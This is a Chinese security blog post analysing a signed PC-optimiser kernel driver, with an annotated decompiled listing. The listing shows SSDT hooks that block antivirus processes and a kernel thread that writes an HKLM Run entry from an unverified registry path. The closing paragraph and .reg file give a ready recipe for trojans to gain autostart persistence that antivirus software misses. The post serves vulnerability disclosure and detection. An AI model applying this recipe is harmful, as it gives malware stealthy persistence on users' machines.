浅谈白利用四
所谓权力越大,责任越大,驱动中被利用,可能导致的危害也更大,这里举个例子,也希望大家在写驱动的时候,除了完成功能外,也要考虑到是否有被恶意利用的可能。
MD5 746994da30a10488d090d95f28611e6f
pcmastercoredrv.sys 魔方电脑大师核心驱动程序
1, 挂钩 ZwOpenProcess,ZwTerminateProcess,禁止360,金山,腾讯,打开其进程,可能导致加速球类无法优化关闭其进程。
2, 等WINLOGON起来后,读取注册表内的指定路径,写入RUN项,开机启动,没有任何验证,导致可被木马利用,随意加载启动项。
目前360已将该驱动清出白名单,但不清楚其他杀软是否还在白名单里。
/*
 * Decompiled (Hex-Rays style) listing of pcmastercoredrv.sys. Reformatted for
 * reading only; the code itself is left as the decompiler produced it, so
 * sub_XXXX names, raw pointer-offset field accesses and unused locals are
 * artifacts of decompilation, not of the original source.
 *
 * Two behaviours matter for a defender reading this:
 *   1. HookOpenTerminateProcess() patches two SSDT entries so that opening or
 *      terminating certain processes fails with STATUS_ACCESS_DENIED.
 *   2. WartForWinLogonThread() waits for winlogon.exe and then writes a
 *      HKLM\...\CurrentVersion\Run value whose path is taken unverified from
 *      HKLM\SOFTWARE\RuanMei\PCMaster (Install_Dir). Anything that can write
 *      that key controls what the kernel thread adds to autostart.
 */

/*
 * DriverEntry. Creates the control device and DosDevices link, installs the
 * SSDT hooks and starts two system threads.
 *
 * Points worth noting in this function:
 *  - IoCreateDevice is called with no security descriptor and Exclusive=0;
 *    whether user-mode callers are restricted depends on the dispatch
 *    routines (DispatchCreate/DispatchIoControl), which are not in this listing.
 *  - The handle of the first PsCreateSystemThread is overwritten by the
 *    second call and only the second is closed -> one thread handle leaks.
 *  - The return value of HookOpenTerminateProcess() is ignored.
 *  - The result of the second PsCreateSystemThread is not checked before
 *    ZwClose(Handle).
 */
NTSTATUS __stdcall start(PDRIVER_OBJECT DriverObject, int a2)
{
    NTSTATUS result; // eax@2
    PVOID v3; // eax@6
    PVOID v4; // edx@6
    signed int i; // [sp+0h] [bp-30h]@3
    HANDLE Handle; // [sp+8h] [bp-28h]@8
    UNICODE_STRING SymbolicLinkName; // [sp+Ch] [bp-24h]@6
    NTSTATUS status; // [sp+18h] [bp-18h]@1
    PDEVICE_OBJECT DeviceObject; // [sp+1Ch] [bp-14h]@1
    UNICODE_STRING DestinationString; // [sp+24h] [bp-Ch]@1
    PVOID DeviceExtension; // [sp+2Ch] [bp-4h]@1

    RtlInitUnicodeString(&DestinationString, L"\\Device\\PCMasterCoreDrv");
    /* 0x24 = device extension size, 0x22 = FILE_DEVICE_UNKNOWN; no SDDL, not exclusive. */
    status = IoCreateDevice(DriverObject, 0x24u, &DestinationString, 0x22u, 0, 0, &DeviceObject);
    if ( status >= 0 )
    {
        /* Default every major function to Generaldispatch, then override
         * IRP_MJ_CREATE (0), IRP_MJ_CLOSE (2) and IRP_MJ_DEVICE_CONTROL (14).
         * NOTE(review): the loop stops at 27, so the last table slot is not
         * touched here -- presumably left at the I/O manager default. */
        for ( i = 0; i < 27; ++i )
            DriverObject->MajorFunction[i] = (PDRIVER_DISPATCH)Generaldispatch;
        DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DispatchCreate;
        DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DispatchClose;
        DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)DispatchIoControl;
        DriverObject->DriverUnload = (PDRIVER_UNLOAD)DrvUnload;

        /* Device extension layout (x86, DWORD offsets) as written here:
         *  +0  device object, +1/+2 device name (Length/MaxLength pair, Buffer),
         *  +3/+4 symbolic link name, +5 = 0, byte +24 = 1, +7 = 1, +8 = 0.
         * The meaning of +5..+8 is not recoverable from this listing. */
        DeviceExtension = DeviceObject->DeviceExtension;
        *(_DWORD *)DeviceExtension = DeviceObject;
        v3 = DeviceExtension;
        *((_DWORD *)DeviceExtension + 1) = *(_DWORD *)&DestinationString;
        *((_DWORD *)v3 + 2) = DestinationString.Buffer;
        *((_DWORD *)DeviceExtension + 5) = 0;
        *((_BYTE *)DeviceExtension + 24) = 1;
        *((_DWORD *)DeviceExtension + 7) = 1;
        *((_DWORD *)DeviceExtension + 8) = 0;
        LogInit("===pDeviceExtension->StartupLogFinished = true\r\n");

        RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\PCMasterCoreDrv");
        v4 = DeviceExtension;
        *((_DWORD *)DeviceExtension + 3) = *(_DWORD *)&SymbolicLinkName;
        *((_DWORD *)v4 + 4) = SymbolicLinkName.Buffer;
        status = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
        if ( status >= 0 )
        {
            /* Return value (hook installed or not) is discarded. */
            HookOpenTerminateProcess();
            status = PsCreateSystemThread(&Handle, 0, 0, 0, 0, (PKSTART_ROUTINE)WartForWinLogonThread, DriverObject);
            if ( status < 0 )
                sub_115C0(L"===Reg CreateThread WartForWinLogon Failed!\n");
            /* Handle from the call above is overwritten here and never closed.
             * NOTE(review): this call carries one more argument than the one
             * above; most likely a copy/extraction artifact of the listing. */
            status = PsCreateSystemThread(&Handle, 0, 0, 0, 0, 0, (PKSTART_ROUTINE)LogProcessCPUUsageThread, DriverObject);
            ZwClose(Handle);
            result = status;
        }
        else
        {
            /* Symbolic link failed: undo the device, propagate the status. */
            IoDeleteDevice(DeviceObject);
            result = status;
        }
    }
    else
    {
        result = status;
    }
    return result;
}

/*
 * Installs the SSDT hooks for ZwOpenProcess and ZwTerminateProcess.
 *
 * Returns 1 if a hook is already present (CheckSsdtHook) or if the table was
 * mapped and patched; on an unsupported OS version the initial value 1 is
 * returned as well, so a "1" does not by itself mean the hook is installed.
 * Returns 0 only when MapKeServiceDescriptorTable() fails.
 *
 * OS gate: (5.1) or (>=6 and minor>=1), i.e. XP and Windows 7+; Vista (6.0)
 * and Server 2003 (5.2) fall through without hooking.
 *
 * The service index is read from the exported Zw* stub (`&ZwOpenProcess + 1`,
 * the immediate of the stub's first instruction) and the table slot is
 * swapped with _InterlockedExchange; the previous pointers are kept in
 * OldZwOpenProcess / OldZwTerminateProcess. SSDT patching is the classic
 * PatchGuard-incompatible technique, which is consistent with the x86-only
 * stack layout seen throughout this listing.
 */
char __cdecl HookOpenTerminateProcess()
{
    char result; // al@2
    signed int v1; // eax@7
    ULONG MajorVersion; // [sp+0h] [bp-18h]@3
    char v3; // [sp+Bh] [bp-Dh]@1
    __int16 v4; // [sp+Ch] [bp-Ch]@1  -- written once, never read
    ULONG MinorVersion; // [sp+10h] [bp-8h]@3
    ULONG BuildNumber; // [sp+14h] [bp-4h]@3

    v3 = 1;
    v4 = 0;
    if ( CheckSsdtHook() )
    {
        result = 1;
    }
    else
    {
        PsGetVersion(&MajorVersion, &MinorVersion, &BuildNumber, 0);
        if ( MajorVersion == 5 && MinorVersion == 1 || MajorVersion >= 6 && MinorVersion >= 1 )
        {
            v1 = MapKeServiceDescriptorTable();
            v3 = v1 >= 0;
            if ( v1 >= 0 )
            {
                OldZwOpenProcess = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))_InterlockedExchange(
                    (signed __int32 *)BaseAddressKeServiceDescriptorTable + *(_DWORD *)((char *)&ZwOpenProcess + 1),
                    (signed __int32)MyZwOpenProcess);
                OldZwTerminateProcess = (int (__stdcall *)(_DWORD, _DWORD))_InterlockedExchange(
                    (signed __int32 *)BaseAddressKeServiceDescriptorTable + *(_DWORD *)((char *)&ZwTerminateProcess + 1),
                    (signed __int32)MyZwTerminateProcess);
                bHookFlag = 1;
            }
        }
        result = v3;
    }
    return result;
}

/*
 * Replacement for the ZwOpenProcess service.
 *
 * Calls the original first, then inspects the resulting handle. If the target
 * is not the caller itself, sub_138C0(pid) != -1 (presumably "pid is on the
 * protected list" -- not visible here) and the caller is neither lsass.exe nor
 * csrss.exe, the call fails with 0xC0000022 (STATUS_ACCESS_DENIED). For the
 * four named security-product processes the returned handle is additionally
 * zeroed in the caller's buffer.
 *
 * Defects visible in this function:
 *  - ObReferenceObjectByHandle takes a reference on Object that is never
 *    released on any path (no ObfDereferenceObject in this function).
 *  - When *a1 is zeroed, the handle the original call already placed in the
 *    caller's handle table is not closed, so the target stays open in that
 *    process.
 *  - *a1 is a caller-supplied pointer; no __try is visible around the
 *    dereferences (the decompiler may have dropped SEH -- confirm against
 *    the binary).
 *  - The denial applies to every caller that passes the filter, not only
 *    to the four named processes; only the handle zeroing is name-specific.
 */
unsigned int __stdcall MyZwOpenProcess(HANDLE *a1, int a2, int a3, int a4)
{
    unsigned int result; // eax@14
    __int64 v5; // [sp+0h] [bp-18h]@4
    int v6; // [sp+8h] [bp-10h]@1
    PEPROCESS v7; // [sp+Ch] [bp-Ch]@4
    PVOID Object; // [sp+10h] [bp-8h]@1
    char *v9; // [sp+14h] [bp-4h]@6

    Object = 0;
    v6 = OldZwOpenProcess(a1, a2, a3, a4);
    if ( v6 >= 0
      && a1
      && ObReferenceObjectByHandle(*a1, 1u, 0, 0, &Object, 0) >= 0
      && (v5 = (unsigned int)PsGetProcessId(Object), v7 = IoGetCurrentProcess(), (PVOID)v7 != Object)
      && sub_138C0(v5) != -1
      && (v9 = (char *)PsGetProcessImageFileName(v7), stricmp(v9, "lsass.exe"))
      && stricmp(v9, "csrss.exe") )
    {
        /* PsGetProcessImageFileName yields only the 15-char short name; the
         * comparison is case-insensitive and not path-qualified. */
        if ( !stricmp(v9, "kxetray.exe")
          || !stricmp(v9, "QQPCRealTimeSpeedup.exe")
          || !stricmp(v9, "QQPCTray.exe")
          || !stricmp(v9, "360Tray.exe") )
            *a1 = 0;
        result = 0xC0000022u;
    }
    else
    {
        result = v6;
    }
    return result;
}

/*
 * Replacement for the ZwTerminateProcess service.
 *
 * Passes through to the original when the handle cannot be referenced, when
 * the caller terminates itself, or when sub_138C0(pid) == -1. Otherwise the
 * call is refused with 0xC0000022 (STATUS_ACCESS_DENIED).
 *
 * Defects visible in this function:
 *  - The stricmp chain against the four product names has no effect: its
 *    results are discarded and the denial happens regardless (likely the
 *    compiler kept the calls but the decompiler shows the dead branches).
 *  - The reference from ObReferenceObjectByHandle is released only on the
 *    deny path; when the second or third condition short-circuits to the
 *    pass-through path the reference leaks.
 */
int __stdcall MyZwTerminateProcess(HANDLE Handle, int a2)
{
    int result; // eax@8
    __int64 v3; // [sp+0h] [bp-18h]@2
    PEPROCESS CurrentProcess; // [sp+Ch] [bp-Ch]@2
    PVOID Object; // [sp+10h] [bp-8h]@1
    char *ImageFileName; // [sp+14h] [bp-4h]@4

    if ( ObReferenceObjectByHandle(Handle, 1u, 0, 0, &Object, 0) < 0
      || (v3 = PsGetProcessId(Object), CurrentProcess = IoGetCurrentProcess(), (PVOID)CurrentProcess == Object)
      || sub_138C0(v3) == -1 )
    {
        result = OldZwTerminateProcess(Handle, a2);
    }
    else
    {
        ImageFileName = (char *)PsGetProcessImageFileName(CurrentProcess);
        /* Results of the comparisons below are never used. */
        if ( stricmp(ImageFileName, "kxetray.exe") && stricmp(ImageFileName, "QQPCRealTimeSpeedup.exe") )
        {
            if ( stricmp(ImageFileName, "QQPCTray.exe") )
                stricmp(ImageFileName, "360Tray.exe");
        }
        ObfDereferenceObject(Object);
        result = 0xC0000022u;
    }
    return result;
}

/*
 * System thread: polls the process list until winlogon.exe exists, then calls
 * WritePcMasterRegRun() once and exits.
 *
 * Runs as a kernel thread in the System process, which is why the later
 * registry write is attributed to PID 4 and tends not to be intercepted by
 * user-mode monitoring -- a useful detection angle (Run-key writes sourced
 * from the System process).
 *
 * Defects visible in this function:
 *  - ExAllocatePool results are used without a NULL check.
 *  - On a query failure (i < 0) the loop exits with P still allocated.
 *  - The WriteLog after PsTerminateSystemThread is unreachable.
 *  - `Sleep` is not a kernel export; presumably a local wrapper around
 *    KeDelayExecutionThread -- not visible here.
 */
void __stdcall WartForWinLogonThread(int a1)
{
    char v1; // [sp+3h] [bp-19h]@1  -- set to 1 once winlogon.exe has been seen
    UNICODE_STRING DestinationString; // [sp+4h] [bp-18h]@8
    PVOID j; // [sp+Ch] [bp-10h]@6
    NTSTATUS i; // [sp+10h] [bp-Ch]@2
    SIZE_T SystemInformationLength; // [sp+14h] [bp-8h]@1
    PVOID P; // [sp+18h] [bp-4h]@1

    SystemInformationLength = 0x100000u;
    P = 0;
    v1 = 0;
    WriteLog(L"===Reg Begin of WartForWinLogon\n");
    while ( 1 )
    {
        P = ExAllocatePool(PagedPool, SystemInformationLength);
        /* Grow the buffer by 1 MiB while the query returns
         * 0xC0000004 (STATUS_INFO_LENGTH_MISMATCH). */
        for ( i = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P, SystemInformationLength, 0);
              i == 0xC0000004;
              i = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P, SystemInformationLength, 0) )
        {
            SystemInformationLength += 0x100000u;
            ExFreePoolWithTag(P, 0);
            P = ExAllocatePool(PagedPool, SystemInformationLength);
        }
        if ( i < 0 )
            break;   /* P is not freed on this path */
        /* Walk SYSTEM_PROCESS_INFORMATION entries (x86 layout):
         *   *(DWORD*)j        NextEntryOffset (0 terminates the list)
         *   *((DWORD*)j + 17) UniqueProcessId (offset 0x44)
         *   (UNICODE_STRING*)j + 7  ImageName (offset 0x38)
         * Entries with PID 0 (Idle) are skipped. */
        for ( j = P; ; j = (char *)j + *(_DWORD *)j )
        {
            if ( *((_DWORD *)j + 17) )
            {
                RtlInitUnicodeString(&DestinationString, L"winlogon.exe");
                if ( RtlEqualUnicodeString((PCUNICODE_STRING)j + 7, &DestinationString, 1u) )
                    break;
            }
            if ( !*(_DWORD *)j )
                goto LABEL_12;
        }
        v1 = 1;
        WritePcMasterRegRun();
LABEL_12:
        ExFreePoolWithTag(P, 0);
        if ( v1 )
            break;
        Sleep(100);
    }
    PsTerminateSystemThread(0);
    WriteLog(L"===Reg End ofWartForWinLogon\n");   /* unreachable */
}

/*
 * Reads three switches from HKLM\SOFTWARE\RuanMei\PCMaster and writes or
 * removes Run entries accordingly:
 *   "st"   -> Run value "pcmaster" = "<Install_Dir>pcmastertray.exe" /autostart
 *   "swg"  -> Run value "winguard" = "<Install_Dir>winguard.exe" /autostart
 *   "pcmas" -> only consulted when "st" != 1: if also 0, the "pcmaster"
 *              Run value is removed via sub_14F20.
 *
 * Notes for a defender:
 *  - v1 ("st") and v0 ("swg") default to 1, so when the values are absent
 *    both Run entries are written anyway; the .reg shown on this page sets
 *    them explicitly, but that is not even required.
 *  - Only the low byte of each value is read (*(_BYTE *)P); the size
 *    returned in v2 is never checked.
 *  - The 4 passed to ReadRegValue is presumably the expected value type
 *    (REG_DWORD) -- ReadRegValue is not in this listing.
 *  - Nothing here verifies that the caller's key contents belong to the
 *    product; any writer of HKLM\SOFTWARE\RuanMei\PCMaster controls the
 *    outcome.
 */
void __cdecl WritePcMasterRegRun()
{
    signed int v0; // [sp+0h] [bp-18h]@1  -- "swg"
    signed int v1; // [sp+4h] [bp-14h]@1  -- "st"
    int v2; // [sp+8h] [bp-10h]@1         -- size out-param, unused
    PCWSTR SourceString; // [sp+Ch] [bp-Ch]@1
    int v4; // [sp+10h] [bp-8h]@1         -- "pcmas"
    PVOID P; // [sp+14h] [bp-4h]@1

    v4 = 0;
    v1 = 1;
    v0 = 1;
    P = 0;
    v2 = 0;
    SourceString = L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster";
    WriteLog(L"===Reg Begin ofWriteRegRun\n");
    if ( ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster", L"pcmas", 4, &P, (size_t *)&v2) )
    {
        v4 = *(_BYTE *)P;
        ExFreePoolWithTag(P, 0x70726567u);   /* pool tag 'preg' */
    }
    if ( ReadRegValue(SourceString, L"st", 4, &P, (size_t *)&v2) )
    {
        v1 = *(_BYTE *)P;
        ExFreePoolWithTag(P, 0x70726567u);
    }
    if ( v1 == 1 )
    {
        WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_Tray\n");
        WriteRegRun(L"pcmaster", (int)L"pcmastertray.exe", (int)L"/autostart");
    }
    else
    {
        if ( !v4 )
        {
            WriteLog(L"===Reg WriteRegRun_DelRegRun\n");
            sub_14F20(L"pcmaster");   /* presumably deletes the Run value -- not shown */
        }
    }
    if ( ReadRegValue(SourceString, L"swg", 4, &P, (size_t *)&v2) )
    {
        v0 = *(_BYTE *)P;
        ExFreePoolWithTag(P, 0x70726567u);
    }
    if ( v0 == 1 )
    {
        WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_WG\n");
        WriteRegRun(L"winguard", (int)L"winguard.exe", (int)L"/autostart");
    }
}

/*
 * Writes one REG_SZ value under
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 *
 * Parameters (as used here):
 *   SourceString  value name ("pcmaster" / "winguard")
 *   a2            executable file name (wide string passed as int)
 *   a3            optional argument string (wide string passed as int), may be 0
 *
 * The value data is built as  "<Install_Dir><a2>" [ <a3>]  by repeated
 * sub_15310(&Data, 2048, ...) calls (presumably a bounded wide concat into
 * the 2048-wchar buffer; not in this listing). Note there is no path
 * separator between Install_Dir and a2 -- this is why the .reg on this page
 * uses "c:\\" -- and no check that Install_Dir is a directory, that the
 * resulting file exists, or that it is signed by the vendor. Whatever
 * Install_Dir says is written to autostart from kernel mode.
 *
 * Other visible details:
 *  - Data/v14 are the decompiler's split view of a single 0x1000-byte
 *    (2048 wchar_t) stack buffer; memset clears bytes 2..0xFFF.
 *  - OBJECT_ATTRIBUTES: Length 24 (x86 sizeof), Attributes 64 =
 *    OBJ_CASE_INSENSITIVE. ZwOpenKey access 0xF003F = KEY_ALL_ACCESS.
 *  - ZwSetValueKey type 1 = REG_SZ; DataSize counts the terminator.
 *  - The function returns 0 unconditionally; v5 (the open/set status) and
 *    v11 (unused key path) are never consumed.
 *
 * Detection hint: a Run-value write on this key whose originating process is
 * System (PID 4) is anomalous and is exactly what this routine produces.
 */
int __stdcall WriteRegRun(PCWSTR SourceString, int a2, int a3)
{
    UNICODE_STRING DestinationString; // [sp+0h] [bp-1040h]@2
    NTSTATUS v5; // [sp+8h] [bp-1038h]@2
    UNICODE_STRING ValueName; // [sp+Ch] [bp-1034h]@5
    int v7; // [sp+14h] [bp-102Ch]@1
    OBJECT_ATTRIBUTES ObjectAttributes; // [sp+18h] [bp-1028h]@2
    HANDLE Handle; // [sp+30h] [bp-1010h]@1
    PVOID P; // [sp+34h] [bp-100Ch]@1
    int v11; // [sp+38h] [bp-1008h]@1
    ULONG DataSize; // [sp+3Ch] [bp-1004h]@1
    wchar_t Data; // [sp+40h] [bp-1000h]@1
    char v14; // [sp+42h] [bp-FFEh]@1

    Handle = 0;
    P = 0;
    v7 = 0;
    v11 = (int)L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster";
    Data = 0;
    memset(&v14, 0, 0xFFEu);
    DataSize = 0;
    WriteLog(L"===Reg Begin ofWriteRegRun\n");
    /* Type 1 presumably REG_SZ; the returned size (v7) is never checked. */
    if ( ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster", L"Install_Dir", 1, &P, (size_t *)&v7) )
    {
        sub_15310(&Data, 2048, L"\"");
        sub_15310(&Data, 2048, P);
        ExFreePoolWithTag(P, 0x70726567u);
        RtlInitUnicodeString(&DestinationString, L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
        ObjectAttributes.Length = 24;
        ObjectAttributes.RootDirectory = 0;
        ObjectAttributes.Attributes = 64;
        ObjectAttributes.ObjectName = &DestinationString;
        ObjectAttributes.SecurityDescriptor = 0;
        ObjectAttributes.SecurityQualityOfService = 0;
        v5 = ZwOpenKey(&Handle, 0xF003Fu, &ObjectAttributes);
        if ( v5 >= 0 )
        {
            sub_15310(&Data, 2048, a2);
            sub_15310(&Data, 2048, L"\"");
            if ( a3 )
            {
                sub_15310(&Data, 2048, L" ");
                sub_15310(&Data, 2048, a3);
            }
            DataSize = 2 * wcslen(&Data) + 2;
            RtlInitUnicodeString(&ValueName, SourceString);
            v5 = ZwSetValueKey(Handle, &ValueName, 0, 1u, &Data, DataSize);
            ZwClose(Handle);
        }
    }
    WriteLog(L"===Reg End ofWriteRegRun\n");
    return 0;   /* status in v5 is discarded */
}
木马只需将自己的可执行文件,放在C盘根目录下,改名为pcmastertray.exe,或winguard.exe,并导入如下注册表,等自己程序起来后,删除注册表,则所有杀软查杀均无法查杀到,而该驱动在开机的时候,在WINLOGON起来之后,会自动将启动项写入注册表。由于写入是在驱动的SYSTEM 线程中,一般杀软不会拦截。
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei] [HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei\PCMaster] "pcmas"=dword:00000001 "st"=dword:00000001 "Install_Dir"="c:\\"